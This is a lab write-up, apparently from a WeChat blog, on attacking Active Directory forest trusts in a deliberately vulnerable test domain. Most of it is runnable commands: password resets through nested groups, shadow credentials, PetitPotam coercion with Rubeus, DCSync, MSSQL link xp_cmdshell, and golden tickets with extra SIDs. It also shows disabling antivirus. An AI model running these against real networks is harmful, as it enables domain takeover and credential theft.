Forest Trust
Foreign group and users
• Seeing the links between domains in BloodHound
MATCH p = (a:Domain)-[:Contains*1..]->(x)-->(w)-->(z)<--(y)<-[:Contains*1..]-(b:Domain) WHERE (x:Container OR x:OU) AND (y:Container OR y:OU) AND (a.name <> b.name) AND (tolower(w.samaccountname) <> "enterprise admins" AND tolower(w.samaccountname) <> "enterprise key admins" AND tolower(z.samaccountname) <> "enterprise admins" AND tolower(z.samaccountname) <> "enterprise key admins") RETURN p
Some groups are nested from one domain into a group of another domain, so members of the first domain inherit that group's rights in the second. BloodHound can also search foreign groups and users directly from the interface.
• Since this is cross-domain, first from sevenkingdoms to the essos domain: the spys group
The sevenkingdoms group small council is nested in the essos group spys. Pick a lucky volunteer from small council (for example petyr.baelish:@littlefinger@) and use the rights spys has in essos, here a password reset on jorah.mormont
net rpc password jorah.mormont -U sevenkingdoms.local/petyr.baelish%@littlefinger@ -S meereen.essos.local
Enter new password for jorah.mormont: <here we enter P@ssword123>
• Verify
cme smb 192.168.56.12 -u jorah.mormont -p 'P@ssword123' -d essos.local
• We can also use shadow credentials instead of resetting the password (no password change for the victim, so less noisy)
certipy shadow add -u petyr.baelish@sevenkingdoms.local -p '@littlefinger@' -dc-ip 192.168.56.12 -target meereen.essos.local -account 'jorah.mormont'
certipy auth -pfx jorah.mormont.pfx -username jorah.mormont -domain essos.local -dc-ip 192.168.56.12
Use unconstrained delegation
Unconstrained delegation
Unconstrained delegation is a Kerberos feature of Windows: an administrator marks a computer or service account as trusted for delegation (the TRUSTED_FOR_DELEGATION bit in userAccountControl, which every domain controller has by default). When a user then authenticates with Kerberos to a service on that host, the KDC puts a forwardable copy of the user's TGT inside the service ticket and the host keeps it in LSASS, so the service can act as that user towards any other service. The user is never asked for anything; the only things that prevent it are the user's own "Account is sensitive and cannot be delegated" flag or membership in Protected Users.
That is why the host matters, not the user: whoever is administrator on an unconstrained host can dump every TGT that has landed in its memory. Nobody has to be tricked into granting a permission; it is enough to make a privileged principal authenticate to the host, for example by coercing a domain controller's machine account with PetitPotam or the printer bug, and that DC's TGT is enough for a DCSync. Across a forest trust the same works, as long as the trust still allows TGT delegation (EnableTGTDelegation), which Microsoft turned off by default for forest trusts with the July 2019 updates.
The mitigations are constrained delegation (msDS-AllowedToDelegateTo) or resource-based constrained delegation, which restrict delegation to a fixed list of services rather than asking the user for approval, putting privileged accounts in Protected Users, keeping domain controllers the only accounts trusted for delegation, and leaving TGT delegation disabled on forest trusts. Unconstrained delegation on anything other than a DC should be treated as a finding.
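The checks a practitioner would run before and after an unconstrained-delegation attack, as an added example that is not code from the original post: classify accounts by their delegation bits, decide whether a victim's TGT would be forwarded at all, and test the trust flag that gates TGT delegation across a forest trust. The account records, host and user names and the Protected Users DN are constructed for the example; the flag values are the documented userAccountControl and trustAttributes bits.

```python
# Added example, not code from the original post. Sample records and names are
# constructed; flag values are the documented userAccountControl / trustAttributes bits.

UF_SERVER_TRUST_ACCOUNT = 0x2000               # domain controller machine account
UF_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UF_NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

# trustAttributes bit that re-enables cross-forest TGT delegation
# (off by default since the 2019 updates; netdom /EnableTgtDelegation:Yes sets it)
TRUST_ATTRIBUTE_CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION = 0x800

PROTECTED_USERS_DN = "CN=Protected Users,CN=Users,DC=example,DC=local"  # assumed DN

# Constructed sample of what an LDAP query for the relevant attributes returns.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000},    # DC: unconstrained by design
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x81000},   # member server, unconstrained
    {"sAMAccountName": "SQL01$", "userAccountControl": 0x1001000,  # constrained + protocol transition
     "msDS-AllowedToDelegateTo": ["cifs/FILE01.example.local"]},
    {"sAMAccountName": "alice", "userAccountControl": 0x200},
    {"sAMAccountName": "bob", "userAccountControl": 0x100200},     # NOT_DELEGATED set
    {"sAMAccountName": "carol", "userAccountControl": 0x200, "memberOf": [PROTECTED_USERS_DN]},
]


def delegation_kind(acct):
    """'unconstrained', 'constrained', 'constrained+protocol-transition' or 'none'."""
    uac = acct["userAccountControl"]
    if uac & UF_TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if acct.get("msDS-AllowedToDelegateTo"):
        if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "constrained+protocol-transition"
        return "constrained"
    return "none"


def find_unconstrained(accounts, include_dcs=False):
    """Hosts whose LSASS caches the TGT of everyone who authenticates with Kerberos.
    DCs are unconstrained by design, so they are only listed on request."""
    names = []
    for acct in accounts:
        if delegation_kind(acct) != "unconstrained":
            continue
        if acct["userAccountControl"] & UF_SERVER_TRUST_ACCOUNT and not include_dcs:
            continue
        names.append(acct["sAMAccountName"])
    return sorted(names)


def tgt_would_be_forwarded(victim):
    """Would the KDC put the victim's forwarded TGT into a service ticket for an
    unconstrained host? Not for NOT_DELEGATED accounts or Protected Users members."""
    if victim["userAccountControl"] & UF_NOT_DELEGATED:
        return False
    if PROTECTED_USERS_DN in victim.get("memberOf", []):
        return False
    return True


def trust_forwards_tgt(trust_attributes):
    """Cross-forest case: the trust object must carry the 0x800 bit."""
    return bool(trust_attributes & TRUST_ATTRIBUTE_CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION)


def coercion_targets(accounts, trust_attributes=None):
    """Accounts whose TGT an unconstrained host could collect by coercion. When the
    victims sit behind a forest trust, pass that trust's trustAttributes as well."""
    if trust_attributes is not None and not trust_forwards_tgt(trust_attributes):
        return []
    return sorted(a["sAMAccountName"] for a in accounts if tgt_would_be_forwarded(a))


if __name__ == "__main__":
    print("unconstrained (non-DC):", find_unconstrained(SAMPLE_ACCOUNTS))
    print("coercible in-forest:", coercion_targets(SAMPLE_ACCOUNTS))
    print("coercible over trust 0x8:", coercion_targets(SAMPLE_ACCOUNTS, trust_attributes=0x8))
```

The same logic applied to real data: query userAccountControl, msDS-AllowedToDelegateTo and memberOf over LDAP, and trustAttributes from the trustedDomain objects under CN=System; if the cross-forest TGT never shows up in Rubeus, the 0x800 bit on the trust is the first thing to check.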
• From kingslanding (the sevenkingdoms DC, so trusted for delegation by default) we can use unconstrained delegation to take over the essos domain
• Connect to kingslanding over RDP as an administrator
xfreerdp /d:sevenkingdoms.local /u:cersei.lannister /p:'il0vejaime' /v:192.168.56.10 /size:80% /cert-ignore
Or open a socks proxy and RDP directly: sevenkingdoms.local cersei.lannister il0vejaime
• For convenience I just turned Defender off
• Run Rubeus and wait for a TGT from the essos forest
# right-click PowerShell and run as administrator, or do it from the prompt
Start-Process powershell -Verb runas
.\Rubeus.exe monitor /filteruser:MEEREEN$ /interval:1
• On Linux, run PetitPotam to coerce meereen into authenticating to kingslanding.
python3 PetitPotam.py -u arya.stark -p Needle -d north.sevenkingdoms.local kingslanding.sevenkingdoms.local meereen.essos.local
On Windows the ticket arrives: the TGT of MEEREEN$ from the essos forest
Copy it to Linux, base64-decode it, convert it to a ccache and call secretsdump for a DCSync (the essos DC's machine account has replication rights in its own domain)
base64 -d rubeus.b64 > meereen.kirbi
ticketConverter.py meereen.kirbi meereen.ccache
export KRB5CCNAME=meereen.ccache
secretsdump.py -k -no-pass -just-dc-ntlm essos.local/'MEEREEN$'@meereen.essos.local
Mssql Trusted link
• MSSQL trusted links are cross-forest, so they can be used for forest-to-forest exploitation (the link authenticates with whatever credentials it was configured with, regardless of who is querying).
• Version used: the mssqlclient from impacket pull request 1397
proxychains -q git clone https://github.com/SecureAuthCorp/impacket myimpacketmssql
cd myimpacketmssql
proxychains -q git fetch origin pull/1397/head:1397
proxychains -q git merge 1397
proxychains -q conda create -n myimpacketmssql python=3.7.9
conda activate myimpacketmssql
pip install .
• Connect to the MSSQL database as jon.snow
python3 mssqlclient.py -windows-auth north.sevenkingdoms.local/jon.snow:iknownothing@castelblack.north.sevenkingdoms.local
• Enumerate the MSSQL trusted links
enum_links
No response at all, damn; something has probably gone wrong again...
• Use the link from castelblack (north domain) to braavos (essos domain)
use_link BRAAVOS
enable_xp_cmdshell
xp_cmdshell whoami
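What enum_links, use_link and enable_xp_cmdshell send under the hood, as an added example that is neither code from the original post nor from impacket: it builds the T-SQL for enumerating links, hopping through one or more links with EXEC ... AT, and turning on xp_cmdshell on the far end, so the same steps can be issued from any SQL client or checked when the tool hangs. The link names, the link chain and the sample queries are assumptions for the example; the quoting rule (one extra level of doubled single quotes per hop) is what makes multi-hop chains break when written by hand.

```python
# Added example, not from the original post or from impacket. Link names and
# queries below are assumptions; the quoting logic is the part worth checking.


def tsql_literal(text):
    """Single-quote a string for T-SQL, doubling any embedded single quote."""
    return "'" + text.replace("'", "''") + "'"


def enum_links_sql():
    """Linked servers plus the RPC Out flag; EXEC ... AT only works when rpcout = 1."""
    return ("SELECT srvname, isremote, rpcout FROM master..sysservers "
            "WHERE srvname <> @@SERVERNAME")


def exec_at(sql, link_path):
    """Wrap sql so it executes on the last server of link_path, traversing each link.
    Every hop adds one level of quoting: the innermost literal ends up with 2**n
    quotes around it after n hops, which is why hand-written chains usually fail."""
    stmt = sql
    for link in reversed(link_path):
        stmt = f"EXEC ({tsql_literal(stmt)}) AT [{link}]"
    return stmt


def openquery(sql, link):
    """Read-only alternative for a single hop when RPC Out is off on the link."""
    return f"SELECT * FROM OPENQUERY([{link}], {tsql_literal(sql)})"


def enable_xp_cmdshell(link_path):
    """sp_configure cannot run through OPENQUERY; it needs RPC Out and EXEC ... AT.
    Returns one statement per step so each can be sent (and fail) separately."""
    steps = [
        "EXEC sp_configure 'show advanced options', 1",
        "RECONFIGURE",
        "EXEC sp_configure 'xp_cmdshell', 1",
        "RECONFIGURE",
    ]
    return [exec_at(step, link_path) for step in steps]


def xp_cmdshell(command, link_path):
    """Run an OS command on the last server of the chain via xp_cmdshell."""
    return exec_at(f"EXEC master..xp_cmdshell {tsql_literal(command)}", link_path)


if __name__ == "__main__":
    print(enum_links_sql())
    for stmt in enable_xp_cmdshell(["BRAAVOS"]):   # BRAAVOS: assumed link name
        print(stmt)
    print(xp_cmdshell("whoami", ["BRAAVOS"]))
    # two hops, to see the quote doubling: server -> LINK1 -> LINK2 (assumed names)
    print(xp_cmdshell("whoami", ["LINK1", "LINK2"]))
```

Run enum_links_sql() first and on each hop: if rpcout is 0 on a link, only OPENQUERY works over it and enable_xp_cmdshell will fail at that hop no matter how the statement is quoted.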
Golden ticket with external forest, sid history ftw ( essos -> sevenkingdoms)
Find SID
lookupsid.py -domain-sids essos.local/daenerys.targaryen:'BurnThemAll!'@192.168.56.120
Domain SID is: S-1-5-21-3888409149-2120389158-266936499
lookupsid.py -domain-sids sevenkingdoms.local/daenerys.targaryen:'BurnThemAll!'@192.168.56.100
# this authentication did not go through... switched to vagrant and it was OK
[*] Domain SID is: S-1-5-21-3909331934-1368599321-1895990551
• Extract the essos krbtgt hash as before
secretsdump.py -just-dc-user 'essos/krbtgt' essos.local/daenerys.targaryen:'BurnThemAll!'@192.168.56.12
Because of SID filtering on the forest trust, the extra-sid has to point at a group with RID > 1000: SIDs with RID < 1000 (Enterprise Admins, Domain Admins and the other built-in groups) are dropped by the trusting domain, and a SID of the trusting forest only gets through at all when SID history is enabled on the trust (netdom /enablesidhistory:yes)
Look DRAGONRIDER up in BloodHound to get its RID
Very confusing, I don't really understand it. But let me just put it together first and see.
ticketer.py -nthash efcae598b59a44ecf315b457389fb7eb -domain-sid S-1-5-21-3888409149-2120389158-266936499 -domain essos.local -extra-sid S-1-5-21-3909331934-1368599321-1895990551-1111 dragon
export KRB5CCNAME=dragon.ccache
smbexec.py -k -no-pass dragon@kingslanding.sevenkingdoms.local -debug
As expected it failed; there is probably a problem with the forest trust configuration in the environment.
The related steps that follow will probably behave the same way, so I am just recording them for now. The normal result is that the hashes get dumped directly.
Exploit acl with external trust golden ticket
• To exploit an ACL from essos, the group holding the ACL in sevenkingdoms is kingsguard
KINGSGUARD
S-1-5-21-3909331934-1368599321-1895990551-1110
• So far I have not found a good way to do this from Linux, but on Windows it is easy
• Connect to meereen (56.12) as administrator and disable the antivirus so mimikatz and PowerView can be used
• Use mimikatz to create a golden ticket carrying the SID of the kingsguard group (RID 1110) in the /sids field
essos SID
mimikatz # kerberos::golden /user:guard /domain:essos.local /sid:S-1-5-21-3888409149-2120389158-266936499 /krbtgt:cd9c4766bf492a7eaa2a107e4fc08ed4 /sids:S-1-5-21-3909331934-1368599321-1895990551-1110 /ptt
• Change stannis's password with PowerView (kingsguard holds the right to do so in sevenkingdoms, and the ticket now carries its SID)
PowerSploit/PowerView.ps1 at dev · PowerShellMafia/PowerSploit
Import-Module .\powerview.ps1
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity stannis.baratheon -AccountPassword $SecPassword -Domain sevenkingdoms.local
• Test
cme smb 192.168.56.10 -u stannis.baratheon -p 'Password123!' -d sevenkingdoms.local
• If we look at the created tickets with klist:
• Server: krbtgt/essos.local @ essos.local (golden ticket)
• Server: krbtgt/SEVENKINGDOMS.LOCAL @ ESSOS.LOCAL (kdc: meereen) (inter-realm TGT)
• Server: ldap/kingslanding.sevenkingdoms.local @ SEVENKINGDOMS.LOCAL (kdc: kingslanding)
• Server: ldap/kingslanding.sevenkingdoms.local/sevenkingdoms.local @ SEVENKINGDOMS.LOCAL (kdc: kingslanding)
Originally published on the WeChat public account (wulala520): Forest Trust